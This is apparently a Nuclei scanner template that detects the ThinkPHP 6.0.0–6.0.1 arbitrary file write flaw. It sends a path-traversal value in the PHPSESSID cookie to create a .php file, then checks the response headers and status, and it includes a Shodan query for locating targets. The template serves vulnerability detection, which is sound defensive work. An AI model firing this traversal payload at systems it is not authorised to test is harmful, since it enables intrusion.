id: thinkphp6-arbitrary-write

info:
  name: ThinkPHP 6.0.0~6.0.1 - Arbitrary File Write
  author: arliya
  severity: critical
  description: |
    ThinkPHP 6.0.0~6.0.1 is susceptible to remote code execution. An attacker can upload any script file through this vulnerability to realize remote code execution takeover.We inject payload into PHPSESSID. In the buggy version, the payload is url encoded and returned as it is. In the fixed version, the payload is returned as a 32-bit hexadecimal string
  reference: |
    - https://community.f5.com/t5/technical-articles/thinkphp-6-0-0-6-0-1-arbitrary-file-write-vulnerability/ta-p/281591
    - https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write
    - https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/thinkphp-v6-file-write.yaml
  metadata:
    verified: true
    max-request: 2
    shodan-query: title:"ThinkPHP"
  tags: thinkphp,file-upload,rce

variables:
  random_filename: "{{to_lower(rand_base(11))}}"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=/../../../public/{{random_filename}}.php
        Content-Type: application/x-www-form-urlencoded

      - |
        GET /{{random_filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: header_1
        words:
          - "Set-Cookie: PHPSESSID=%2F..%2F..%2F..%2Fpublic%2F{{random_filename}}.php"

      - type: dsl
        dsl:
          - "status_2 == 200"
# digest: 4b0a00483046022100f8d2dcd7ab599a92095428ff31bc7a4a3c09befacc814c2804ca8ff7a0a62635022100d876802d930054655ca2299f666120809dfd8976e6a6c5f4992c3ec715be665a:922c64590222798bb761d5b6d8e72950